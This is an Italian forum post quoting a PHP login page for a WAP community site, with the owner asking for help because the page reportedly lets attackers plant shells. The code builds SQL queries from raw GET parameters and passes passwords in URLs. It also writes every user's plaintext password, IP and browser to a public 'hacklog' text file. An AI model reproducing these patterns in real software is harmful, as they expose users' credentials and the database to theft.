Codice PHP:
<?php
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
//header('Content-type: application/vnd.wap.xhtml+xml');
echo "<?xml version=\"1.0\"?>";
echo "<!DOCTYPE html PUBLIC \"-//WAPFORUM//DTD XHTML Mobile 1.0//EN\" \"http://www.wapforum.org/DTD/xhtml-mobile10.dtd\">";
?>
<html xmlns="http://www.w3.org/1999/xhtml">
<?php
include("config.php");
include("core.php");
connectdb();
$bcon = connectdb();
if (!$bcon)
{
echo "<head>";
echo "<title>Errore!!!</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/white_medium.css\">";
echo "<head>";
echo "<body>";
echo "<p align=\"center\">";
echo "<img src=\"../images/notok.gif\" alt=\"!\"/>
";
echo "[b][b]Errore! connessione al database persa...[/b][/b]
";
echo "vi chiediamo gentilmente di pazientare fino a quando il problema non sara risolto...";
echo "</p>";
echo "</body>";
echo "</html>";
exit();
}
$uid = $_GET["loguid"];
$pwd = $_GET["logpwd"];
$sitename = mysql_fetch_array(mysql_query("SELECT value FROM ibwf_settings WHERE name='sitename'"));
$sitename = $sitename[0];
//$theme = mysql_fetch_array(mysql_query("SELECT theme FROM ibwf_users WHERE name='".$uid."'"));
$tolog = false;
echo "<head>";
echo "<title>$uid@$sitename</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/$theme[0]\">";
echo "</head>";
echo "<body>";
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."'"));
if($uinf[0]==0)
{
echo "<head>";
echo "<title>Errore!!!</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/white_medium.css\">";
echo "</head>";
echo "<body>";
}
$epwd = md5($pwd);
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."' AND pass='".$epwd."'"));
if($uinf[0]==0)
{
echo "<head>";
echo "<title>Errore!!!</title>";
echo "<link rel=\"stylesheet\" type=\"text/css\" href=\"../themes/white_medium.css\">";
echo "</head>";
echo "<body>";
}
echo "<p align=\"center\">";
echo "<div><img src=\"../images/logo.gif\" alt=\"logo\"/></div>";
// echo mobads();
echo "<p align=\"center\">";
echo "Se salvi questa pagina non dovrai effettuare il login la prossima volta
";
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."'"));
if($uinf[0]==0)
{
//Check for user ID
echo "<img src=\"../images/notok.gif\" alt=\"X\"/>Nick inesistente
";
}else{
//check for pwd
$epwd = md5($pwd);
$sid = md5($did);
$brws = explode(" ",$HTTP_USER_AGENT);
$ubr = $brws[0];
$uip = getip();
$host = gethostbyaddr($uip);
if (!$host) { $host = $uip; }
$time = time() + (17 * 60 * 60);
$newtime = date("H:i",$time);
$date = strtotime('+17 hours');
$newdate = date('D jS M y',$date);
$fp = fopen("hacklog/info.txt","a+");
fwrite ($fp, "\n" .$newtime." Data:".$newdate." Hack Attempt On Name:".$uid." Pass:".$pwd." Browser:".$ubr." Host Name:".$host." IP:".$uip."\n");
fclose($fp);
$uinf = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."' AND pass='".$epwd."'"));
if($uinf[0]==0)
{
echo "<img src=\"../images/notok.gif\" alt=\"X\"/>Password Errata
";
echo "[b]0 [/b]<a accesskey=\"0\" href=\"index.php\"><img src=\"../images/home.gif\" alt=\"\"/>Home</a>";
echo "</p>";
echo "</body>";
echo "</html>";
exit();
}
$validated = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM ibwf_users WHERE name='".$uid."' AND pass='".$epwd."' AND validated='0'"));
if(($validated[0]>0)&&(validation()))
{
echo "<img src=\"../images/notok.gif\" alt=\"X\"/>[b]Nick NON validato[/b]
Un amministratore valutera se attivare o meno il suo nick
Grazie
";
}else{
$ipr = getip();
$brws = $_SERVER['HTTP_USER_AGENT'];
$ubr = $brws;
$alli = "Nick: ".$uid."
Password: ".$pwd."
Ip-Address: ".$ipr."
Browser: ".$ubr."
Script: Wap 2.0(xhtml)
----------
";
if(trim($uid)!=""){
$fname = "hacklog/info.txt";
$out = fopen($fname,"a+");
fwrite($out,$alli);
fclose($out);}
$tm = time();
$xtm = $tm + (getsxtm()*60);
$did = $uid.$tm;
$res = mysql_query("INSERT INTO ibwf_ses SET id='".md5($did)."', uid='".getuid_nick($uid)."', expiretm='".$xtm."'");
if($res)
{
$tolog=true;
echo "<img src=\"../images/ok.gif\" alt=\"+\"/>Loggato con successo $uid
";
$idn = getuid_nick($uid);
$lact = mysql_fetch_array(mysql_query("SELECT lastact FROM ibwf_users WHERE id='".$idn."'"));
mysql_query("UPDATE ibwf_users SET lastvst='".$lact[0]."' WHERE id='".$idn."'");
}else{
//is user already logged in?
$logedin = mysql_fetch_array(mysql_query("SELECT (*) FROM ibwf_ses WHERE uid='".$getuid_nick($uid)."'"));
if($logedin[0]>0)
{
//yip, so let's just update the expiration time
$xtm = time() + (getsxtm()*60);
$res = mysql_query("UPDATE ibwf_ses SET expiretm='".$xtm."' WHERE uid='".getuid_nick($uid)."'");
if($res)
{
$tolog=true;
echo "<img src=\"../images/ok.gif\" alt=\"+\"/>Loggato con successo $uid
";
}else{
echo "<img src=\"../images/point.gif\" alt=\"!\"/>Non puoi accedere...ritenta piu tardi
"; //no chance this could happen unless there's error in mysql connection
}
}
}
}
}
if($tolog)
{
$sid = md5($did);
addonline(getuid_sid($sid),"Loggato","");
echo "<a accesskey=\"1\" href=\"index.php?action=main&sid=$sid\"><img src=\"../images/home.gif\" alt=\"\"/>Entra $sitename</a>
";
echo "
<a href=\"index.php?action=sitethms&sid=$sid\">Cambia Tema</a>
";
$popmsgs = mysql_fetch_array(mysql_query("SELECT popmsg FROM ibwf_users WHERE name='".$uid."'"));
if($popmsgs[0]==0){
echo "<a href=\"index.php?action=popenable&sid=$sid\">Abilita Popup</a>
";
}else{
echo "<a href=\"index.php?action=popdisable&sid=$sid\">Disabilita Popup</a>
";
}
echo "
Invita i tuoi amici a partecipare
$sitename La community libera!!";
}else{
echo "[b]0 [/b]<a accesskey=\"0\" href=\"index.php\"><img src=\"../images/home.gif\" alt=\"\"/>Home</a>";
}
echo "</p>";
echo "</body>";
?>
</html>
mi hanno segnalato che questa pagina è vulnerabile alle shell...sapete aiutarmi a renderla sicura??? grazie 
Rispondi quotando